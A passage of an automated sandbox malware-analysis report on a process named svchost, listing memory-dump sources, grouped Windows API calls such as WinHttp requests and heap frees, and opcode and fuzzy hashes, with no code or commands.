          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Http$CloseHandleRequest$HeadersOpenOptionQueryReceiveResponseSendTimeouts
          • String ID: 2)
          • API String ID: 1140403012-1274239105
          • Opcode ID: ca76223a764c42e3e576a9eaca017e5749e6c79a234e6967d36dbbb6f7a1b5cb
          • Instruction ID: c866e5fc1bbb2455b780a7f5f5a0285e187b55cd79e2f29ec521d05873807281
          • Opcode Fuzzy Hash: ca76223a764c42e3e576a9eaca017e5749e6c79a234e6967d36dbbb6f7a1b5cb
          • Instruction Fuzzy Hash: 90516C72204B8186EB65CF26F850BAA73A0F78CB84F145116EF8987B68DB39C555CB90
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: String$Free$??3@Alloc$??2@Heap
          • String ID:
          • API String ID: 3556069409-0
          • Opcode ID: ec27783b2e876d2f249bbed04aa86fcb934e499a021eea16907d0ee533d21b6c
          • Instruction ID: c0ef10fccdeb6daa0a0422ac56e41beaac227df42e421e6682d1b4ce94b3c9bf
          • Opcode Fuzzy Hash: ec27783b2e876d2f249bbed04aa86fcb934e499a021eea16907d0ee533d21b6c
          • Instruction Fuzzy Hash: CAA17E75305A8086EA62EF12B8143EB23A5FB8DBCAF144515AF4E0B7A8EF39C541C750
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: String$Free$Alloc$Heapmemcpymemset
          • String ID:
          • API String ID: 611701654-0
          • Opcode ID: 43e2484f7a0373ffed07650949c510c01665978dde713542509007a1855861b5
          • Instruction ID: 1bf9e857b8df484256096c26ec551cdfd3ef17b886eb789306359d79b8ec2ccb
          • Opcode Fuzzy Hash: 43e2484f7a0373ffed07650949c510c01665978dde713542509007a1855861b5
          • Instruction Fuzzy Hash: C7914E32214AD186EB628F13E8503EA77A0FB8DBC8F449055FB8A4B765DF7AC546C740
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$Heap$??2@String_time64memset$??3@Alloc
          • String ID:
          • API String ID: 2204789691-0
          • Opcode ID: 95ac986d8669442a64dbbed0be9654765a4166706f81caccdcbd7723b73e3a14
          • Instruction ID: d9dbd6d1c3e7fa4b14e618689f3d3978398575ef73f47ae2eb561969472c8340
          • Opcode Fuzzy Hash: 95ac986d8669442a64dbbed0be9654765a4166706f81caccdcbd7723b73e3a14
          • Instruction Fuzzy Hash: 29812872205B8586EA62EF12E8503EA63A5F7CDBC5F040029EF8D4B7A5DF3AC955C740
          APIs
          • WinHttpQueryDataAvailable.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 000000014000DA23
          • RtlReAllocateHeap.NTDLL ref: 000000014000DBA1
          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 000000014000DA74
          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 000000014000DA96
          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 000000014000DAD9
          • WinHttpReadData.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 000000014000DBDF
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: AddressDataHttpProc$AllocateAvailableHeapLibraryLoadQueryReadmemcpymemset
          • String ID:
          • API String ID: 2116122043-0
          • Opcode ID: eda387c1990850be9d72052e7b5767021a6b702d6547201d64221c1c24894c1a
          • Instruction ID: dcb2aa4c958721db2a120c4ea9a07c4cdbbbd9df540347d3848d8a894ea84299
          • Opcode Fuzzy Hash: eda387c1990850be9d72052e7b5767021a6b702d6547201d64221c1c24894c1a
          • Instruction Fuzzy Hash: 9D512672305B8486EA62CB17E8443DAB7A5B78CBC4F448126AF8D4B769EF7CC445C750
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Http$CloseHandle$FreeHeap$ConnectCountOpenTickmemset
          • String ID:
          • API String ID: 2154369044-0
          • Opcode ID: 8013fb579bf0e103eeaccab939ae22c85777802004ef9c5a42ee6ec905e88f47
          • Instruction ID: 6968e017db492f2cf7c0abe04c4aaab3eddd08ff69e7388afb2cb71fd0606d81
          • Opcode Fuzzy Hash: 8013fb579bf0e103eeaccab939ae22c85777802004ef9c5a42ee6ec905e88f47
          • Instruction Fuzzy Hash: 6BA1E172211BC185EB62DF22E8503EE33A1FB99BC8F445016EB895BB69DF39C585C710
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$freeaddrinfo$AddressCleanupLibraryLoadProcStartup
          • String ID:
          • API String ID: 4167984890-0
          • Opcode ID: b6c1d0173120b872468714721331bb600554943aecce16ba3b87f6cb93eadc8f
          • Instruction ID: 1f05485aafd538e14a92043d9081f1b9a7aae193132c0cc0b42c540dcab88815
          • Opcode Fuzzy Hash: b6c1d0173120b872468714721331bb600554943aecce16ba3b87f6cb93eadc8f
          • Instruction Fuzzy Hash: DF716A76201BC185EB62DF62E8943EA23A1FB8EBC8F444115EB8E47B65DF38C545C740
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Http$CloseHandleRequest$HeadersOpenOptionQueryReceiveResponseSendTimeouts
          • String ID:
          • API String ID: 1140403012-0
          • Opcode ID: aebf35e371f6fea2448f9b5fe53fe8f08ea4509975682a84b659a6bee2c47b2f
          • Instruction ID: eebc90c8ce48de3e98ba809765a9d91c4a9be35668c6a490bbbc6456ef9780f7
          • Opcode Fuzzy Hash: aebf35e371f6fea2448f9b5fe53fe8f08ea4509975682a84b659a6bee2c47b2f
          • Instruction Fuzzy Hash: C241B172208B8486EB25CF26F4507EA77A4F78CB88F54411AEB8D47768EF39C584CB50
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: AddressProc$HeapLibraryLoad$AllocateFileModuleNameProcessmemcpymemset
          • String ID:
          • API String ID: 2956276425-0
          • Opcode ID: ef3f1b3311ed1376dd4c04dcf21c248c285364accc3ced16850b60ca19486d22
          • Instruction ID: fe1601f0d561c1644e1890eb6a4d3931ee81d1573273c71cbb6c5fd60530c169
          • Opcode Fuzzy Hash: ef3f1b3311ed1376dd4c04dcf21c248c285364accc3ced16850b60ca19486d22
          • Instruction Fuzzy Hash: 00411471201B8585EA62DB12E8443D963A4FB8CBC4F584529EB8D07B79EF78C949C740
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: AddressProc$Heap$Allocate$LibraryLoadProcessmemcpymemset
          • String ID:
          • API String ID: 2235880649-0
          • Opcode ID: 14afeceeeb4ff7259c377ccb9d912ef373db31879d69f19dba7fcc9a066632ef
          • Instruction ID: a4c0c1064b289df270925e2bef4429f91acbcf3427644b2579803443337a3f80
          • Opcode Fuzzy Hash: 14afeceeeb4ff7259c377ccb9d912ef373db31879d69f19dba7fcc9a066632ef
          • Instruction Fuzzy Hash: BD3105B5205B8581EA22DB16F9403D923A5FB8CBC8F484525EB8D17B7AEF7DC549C700
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$String$Heap
          • String ID:
          • API String ID: 4134718113-0
          • Opcode ID: 5ce186634ba1048476c2aab6cefeef9c61c33636ed2beaa4357a2c441f44e577
          • Instruction ID: aed83f4b948c4985c135c6fbceb64c6b8094804d589bec6b40d7a8f706b6a698
          • Opcode Fuzzy Hash: 5ce186634ba1048476c2aab6cefeef9c61c33636ed2beaa4357a2c441f44e577
          • Instruction Fuzzy Hash: 5DC14F76614B9186EB62DF26D8503EE7760FB88BC8F144015EB8E4BBA8DF79C545C700
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$memcpy
          • String ID:
          • API String ID: 1887603139-0
          • Opcode ID: cdb081c7fe57a8e15ae6026e049c3cbad653b2c357f5b1a6b31e992980573e73
          • Instruction ID: ed98ba6ede692f367d8fff878989292d2ab0398e512eb47c8f97488a2b74d39a
          • Opcode Fuzzy Hash: cdb081c7fe57a8e15ae6026e049c3cbad653b2c357f5b1a6b31e992980573e73
          • Instruction Fuzzy Hash: 7051BCB2600BC481F752CF66E8007EA23A4FB8ABCCF058119EF8D17676DF3885858740
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeString
          • String ID:
          • API String ID: 3341692771-0
          • Opcode ID: 9164363e3df22314f312239187880fad4b7a9d552fd5b7cf99c6ac724edd476b
          • Instruction ID: dd41a748227c6243df9798e51560345f6e40f6322dbc4b2b080599702ec169ce
          • Opcode Fuzzy Hash: 9164363e3df22314f312239187880fad4b7a9d552fd5b7cf99c6ac724edd476b
          • Instruction Fuzzy Hash: 66E13372211AD586EF62CF26D8503ED77A0FB88BC8F449056EB8E4B669DF76C605C310
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: ??3@$??2@FreeHeap
          • String ID:
          • API String ID: 1757622238-0
          • Opcode ID: 11c8ce8e7e0d1981926aa617da1213d9ca6a6b43375e24facf04d2d8059c808a
          • Instruction ID: 29537610e8d11700659b38353b7452f6f9fc0ea2a811a385638278bdb090ea32
          • Opcode Fuzzy Hash: 11c8ce8e7e0d1981926aa617da1213d9ca6a6b43375e24facf04d2d8059c808a
          • Instruction Fuzzy Hash: C1A15FB2205A8182EB62DF13B4507EFB3A4FB99BC5F045126EB8947BA5DF79C841C740
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$ErrorLast
          • String ID: *.*
          • API String ID: 2332451156-438819550
          • Opcode ID: b30ee97ddfff90d921fc3d52932d7a5ba7ced4178ab3b975e1da280bb0eb53f2
          • Instruction ID: 34dfc1c74ec25d379e75e5fc480104f8909db529063c5106447f390b2015c3b2
          • Opcode Fuzzy Hash: b30ee97ddfff90d921fc3d52932d7a5ba7ced4178ab3b975e1da280bb0eb53f2
          • Instruction Fuzzy Hash: 46819DB1211B8582EB66CB13E5503EA73A5FB88BC0F445126EB8A577A9EF38C941C750
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$_wtoi
          • String ID:
          • API String ID: 500119451-0
          • Opcode ID: cf2e6b14873cbda237f9802f76c90b55902cd014c2792bbb12101c55a9548aad
          • Instruction ID: 369d08c27aeb9e497d69f017f6d0c736d1be854fe5c0f34ec9398f35f1db6328
          • Opcode Fuzzy Hash: cf2e6b14873cbda237f9802f76c90b55902cd014c2792bbb12101c55a9548aad
          • Instruction Fuzzy Hash: DD516D72605B8482EB62DF57B8403ABA7A4F78DBD4F448025EF89437A5DF38C9958700
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$String$Heap
          • String ID:
          • API String ID: 4134718113-0
          • Opcode ID: ed4153d8dbd31d6f314157dcbdedce6db1cc8a59a21d44a72ca7804b43617e2e
          • Instruction ID: 04baafabb85ef5c752686726c093db061e42867f807bf42f4ef44dac0b2fe2da
          • Opcode Fuzzy Hash: ed4153d8dbd31d6f314157dcbdedce6db1cc8a59a21d44a72ca7804b43617e2e
          • Instruction Fuzzy Hash: 47414D72205A8082EE62CF26E8503AA67A1FB8DFD9F044156EF8E577B9DF39C545C700
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: memset$_time64$??2@AddressFreeHeapHttpLibraryLoadOpenProc
          • String ID:
          • API String ID: 3106453554-0
          • Opcode ID: 8d1d217a09c486184b67123d1f67058338c9e71b8c42690334822dbe439251cf
          • Instruction ID: 8b04f6f2c231c0026719b809a071ef14e3336b76cfd83b8ab9bcfbeb16143b4b
          • Opcode Fuzzy Hash: 8d1d217a09c486184b67123d1f67058338c9e71b8c42690334822dbe439251cf
          • Instruction Fuzzy Hash: B7415BB2610B8082E756DF26F8543DA33A4FB48BC8F544129EB8D077A6DF39C555C780
          APIs
          • SysFreeString.OLEAUT32 ref: 000000014000EF92
          • HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000EFB0
          • HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000EFCB
          • HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000F019
          • HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000F049
          • HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000F067
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$Heap$String
          • String ID:
          • API String ID: 2419388322-0
          • Opcode ID: be6e7307092a1a952a652f78f7010cba9a840ae09ac9c62c558f82d271d8ae95
          • Instruction ID: 2e050d31a97349d7cdf6a2b87fb76f8c7cecf5345a2535d832a4d2139c467b61
          • Opcode Fuzzy Hash: be6e7307092a1a952a652f78f7010cba9a840ae09ac9c62c558f82d271d8ae95
          • Instruction Fuzzy Hash: 9031F775201B8182EB96DF67E8503EA23A4F78DBC4F045126EB8A577B6CF39C8858750
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$Heap$String
          • String ID:
          • API String ID: 2419388322-0
          • Opcode ID: e9e0e31790792d4b0a460b2c6ecab48ab662761ac68e47726af6c54c1e2625d8
          • Instruction ID: 77b78661734df3ff0c0ddf4feed43cefbfa98e925e832546ec525beed8cc0a7a
          • Opcode Fuzzy Hash: e9e0e31790792d4b0a460b2c6ecab48ab662761ac68e47726af6c54c1e2625d8
          • Instruction Fuzzy Hash: 1F310675200B8582EB96EF57E84439A23A4F78DFC5F44411AEF8E5776ACE39C885C740
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap
          • String ID:
          • API String ID: 3298025750-0
          • Opcode ID: 768fc2b4c23c74d1e8dfd13da3aa98bb1163e70c91c34df0f9885c6c67c5b0d5
          • Instruction ID: cef34096d4367dcbd8395c8382d480f973210d14fd31fa0a13d25510343ea6c8
          • Opcode Fuzzy Hash: 768fc2b4c23c74d1e8dfd13da3aa98bb1163e70c91c34df0f9885c6c67c5b0d5
          • Instruction Fuzzy Hash: B2C16EB2200B8585EB62DF13A8407EA63A4F749BC8F44812AEF8D47BA5DF39C945C744
          APIs
          • memset.MSVCRT ref: 0000000140015981
          • HeapFree.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,0000000140016753), ref: 0000000140015B76
          • HeapFree.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,0000000140016753), ref: 0000000140015B90
          • HeapFree.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,0000000140016753), ref: 0000000140015BAF
          • HeapFree.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,0000000140016753), ref: 0000000140015BCE
          • HeapFree.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,0000000140016753), ref: 0000000140015BE8
          • HeapFree.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,0000000140016753), ref: 0000000140015C02
            • Part of subcall function 000000014000CAF0: HeapFree.KERNEL32(?,?,00000000,000000014000DD66), ref: 000000014000CBAA
            • Part of subcall function 000000014000BFE0: HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000001400166BE), ref: 000000014000C080
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$memset
          • String ID:
          • API String ID: 631287834-0
          • Opcode ID: 24f8cd55a8a0ef05f4e9c24f79871f4228e885fe3935998ed1778025e6330dd8
          • Instruction ID: aed008c8da3fdc3c0ff40e812c2c567fdf27eb098b86fed716892b971eaa37ac
          • Opcode Fuzzy Hash: 24f8cd55a8a0ef05f4e9c24f79871f4228e885fe3935998ed1778025e6330dd8
          • Instruction Fuzzy Hash: 1281A231209784C5EAA6AB17A4803DAA794FB8DFC5F484115BF8D4FBB6DF3AC9058301
          APIs
          Memory Dump Source
          • Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
